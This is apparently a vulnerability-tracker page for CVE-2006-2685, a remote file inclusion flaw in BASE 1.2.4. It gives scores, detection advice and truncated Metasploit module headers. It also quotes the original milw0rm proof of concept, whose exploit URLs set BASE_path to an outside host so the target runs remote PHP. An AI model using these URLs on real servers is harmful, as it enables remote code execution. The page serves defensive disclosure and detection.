CVE-2006-2685
published 2006-05-31CVE-2006-2685: PHP remote file inclusion vulnerability in Basic Analysis and Security Engine (BASE) 1.2.4 and earlier, with register_globals enabled, allows remote attackers…
PriorityP341medium4CVSS 2.0
AVNACHAuNCPIPAN
EXPLOIT
EPSS
49.19%
98.7th percentile
PHP remote file inclusion vulnerability in Basic Analysis and Security Engine (BASE) 1.2.4 and earlier, with register_globals enabled, allows remote attackers to execute arbitrary PHP code via a URL in the BASE_path parameter to (1) base_qry_common.php, (2) base_stat_common.php, and (3) includes/base_include.inc.php.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kevin_johnson | basic_analysis_and_security_engine | — | — |
| kevin_johnson | basic_analysis_and_security_engine | — | — |
| kevin_johnson | basic_analysis_and_security_engine | — | — |
| kevin_johnson | basic_analysis_and_security_engine | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests targeting BASE PHP files with a remote URL supplied in the BASE_path parameter, indicating remote file inclusion exploitation attempt. ↗
- →Look for GET requests to /base/base_qry_common.php (or /snort/base_qry_common.php) where BASE_path contains an http:// or https:// URL, which is the canonical exploit pattern for this RFI. ↗
- →The Metasploit module hex-encodes the remote payload URL using Rex::Text.to_hex with '%' prefix before injecting it into BASE_path; detect percent-encoded URLs in the BASE_path query parameter as an evasion indicator. ↗
- →The vulnerability requires register_globals to be enabled on the target PHP installation; correlate exploitation attempts with PHP environments where register_globals is on. ↗
- ·The vulnerability is only exploitable when PHP's register_globals directive is enabled; systems with register_globals disabled are not affected. ↗
- ·Affected versions are BASE 1.2.4 and earlier (codename 'melissa'); the Metasploit module targets this version range exclusively. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BASE - 'base_qry_common' Remote File Inclusion (Metasploit)
exploitdb·2010-11-24
CVE-2006-2685 BASE - 'base_qry_common' Remote File Inclusion (Metasploit)
BASE - 'base_qry_common' Remote File Inclusion (Metasploit)
---
##
# $Id: base_qry_common.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BASE base_qry_common Remote File Include',
'Description' => %q{
This module exploits a remote file inclusion vulnerability in
the base_qry_common.php file in BASE 1.2.4 and earlier.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11127 $',
'References' =>
[
[ 'CVE', '2006-2685' ],
[ 'OSVDB', '49366'],
[ 'BID', '18298' ],
],
'Privileged' =>
Exploit-DB
BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit)
exploitdb·2008-06-14
CVE-2006-2685 BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit)
BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 'BASE base_qry_common Remote File Include.',
'Description' => %q{
This module exploits a remote file inclusion vulnerability in
the base_qry_common.php file in BASE 1.2.4 and earlier.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision:$',
'References' =>
[
[ 'CVE', '2006-2685' ],
[ 'BID', '18298' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType'
Exploit-DB
BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion
exploitdb·2006-05-25
CVE-2006-2685 BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion
BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion
---
# Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities
# Just glanced over BASE for a pentesting job. /str0ke ! milw0rm.com
##################################
[code (base_qry_common.php)]
include_once("$BASE_path/includes/base_signature.inc.php");
[/code]
http://[site]/snort/base_qry_common.php?BASE_path=http://www.milw0rm.com/index.php?&
########################################
[code (base_stat_common.php)]
include_once("$BASE_path/includes/base_constants.inc.php");
[/code]
http://[site]/snort/base_stat_common.php?BASE_path=http://www.milw0rm.com/index.php?&
###############################################
[code (includes/base_include.inc.php)]
include_once("$BASE_path/includes/base_db.
Metasploit
BASE base_qry_common Remote File Include
metasploit
BASE base_qry_common Remote File Include
BASE base_qry_common Remote File Include
This module exploits a remote file inclusion vulnerability in the base_qry_common.php file in BASE 1.2.4 and earlier.
No writeups or analysis indexed.
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=370576http://secunia.com/advisories/20300http://sourceforge.net/forum/forum.php?forum_id=577228http://www.osvdb.org/25770http://www.securityfocus.com/bid/18298http://www.vupen.com/english/advisories/2006/1996https://exchange.xforce.ibmcloud.com/vulnerabilities/26652https://www.exploit-db.com/exploits/1823http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=370576http://secunia.com/advisories/20300http://sourceforge.net/forum/forum.php?forum_id=577228http://www.osvdb.org/25770http://www.securityfocus.com/bid/18298http://www.vupen.com/english/advisories/2006/1996https://exchange.xforce.ibmcloud.com/vulnerabilities/26652https://www.exploit-db.com/exploits/1823
2006-05-31
Published